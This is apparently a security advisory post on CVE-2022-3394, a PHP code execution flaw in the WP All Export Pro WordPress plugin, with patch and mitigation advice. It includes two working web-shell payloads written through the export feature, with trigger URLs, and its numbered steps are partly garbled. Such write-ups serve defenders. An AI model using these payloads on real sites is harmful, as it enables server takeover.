Summary:
CVE-2022-3394 uncovers a critical privilege escalation and remote code execution vulnerability in the WordPress plugin WP All Export Pro before version 1.7.9. Due to insufficient restriction of powerful features, any logged-in user granted the ability to run exports can execute arbitrary PHP code on the site—functionality that should be strictly reserved for administrators. This post dives deep into the vulnerability, reproducible steps, exploit details, and how to protect your WordPress site.
Background: What is WP All Export Pro?
WP All Export Pro is a popular WordPress plugin (over 20,000 active installs) used for exporting WordPress data (posts, users, WooCommerce orders) to various file formats. While only administrators are allowed to export data by default, the functionality can be delegated to other user roles via capability changes or membership plugins.
The Vulnerability
Reported and assigned as CVE-2022-3394 (NVD entry), the key issue is that the plugin does not restrict sensitive export hooks and features to just administrators. Any logged-in user with the 'export' capability (sometimes editors, authors, even regular users, based on admin configuration) can access export features. Critically, these features include the ability to execute custom PHP code during an export—intended as a powerful tool for data formatting, but extremely dangerous in the wrong hands.
1. The Core Flaw
In WP All Export Pro, users with export permissions can insert "Custom PHP functions" as part of their export templates. The plugin fails to enforce a check to verify that the user is an administrator before allowing execution of this code.
Vulnerable code (simplified)
if ( current_user_can( 'export' ) ) {
// No is_admin() or stricter check
eval( $user_supplied_php_function );
}
This means *any* user with 'export' capability can reach code like this. By default, that's only administrators—but if your site's access controls have been modified, editors, authors, or even subscribers might have this access.
Many site owners increase convenience or reduce load on admins by delegating export permissions
- via User Role Editor,
or via third-party membership plugins.
Note: Exploitation is only possible if 'export' capability is delegated to a non-admin user.
Example attack payload
// PHP code injected as a "custom function" in export settings
file_put_contents(ABSPATH . '/pwned.php', '<?php echo shell_exec($_GET["cmd"]); ?>');
After running this export, the attacker navigates to https://example.com/pwned.php?cmd=ls to remotely execute shell commands on the server.
During export setup, when prompted to enter a custom function, enter this code
file_put_contents(ABSPATH . '/rce.php', '<?php system($_GET["cmd"]); ?>');
Complete and run the export.
6. The file rce.php is now in the WordPress root and can be accessed remotely to run arbitrary commands:
`
https://your-site.com/rce.php?cmd=whoami
`
Result:
You have code execution as the web server user!
References
- NVD Entry for CVE-2022-3394
- WPScan Advisory
- Plugin Changelog
- Patch notes from WP All Export Pro Authors
Is My Site At Risk?
- Yes, if you are using WP All Export Pro < 1.7.9 and have granted export permissions to any non-administrator account (intentionally or via plugin/role changes).
Mitigation and Fix
Patch:
The maintainers have resolved this in WP All Export Pro version 1.7.9 by:
Update WP All Export Pro to at least 1.7.9.
2. Review role/capability assignments for export functionality.
Takeaways
Privilege boundaries in WordPress are only as strong as your plugin code. Any functionality that enables code execution should always check for *the highest level of privilege*, even if the capability can be assigned via roles. Plugins like WP All Export Pro must assume some administrators will delegate access—and code accordingly.
Exclusive for this article. Feel free to share and help secure the WordPress community!
If you use WP All Export Pro, update now and audit your site for unauthorized files and users.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 15:09:00 UTC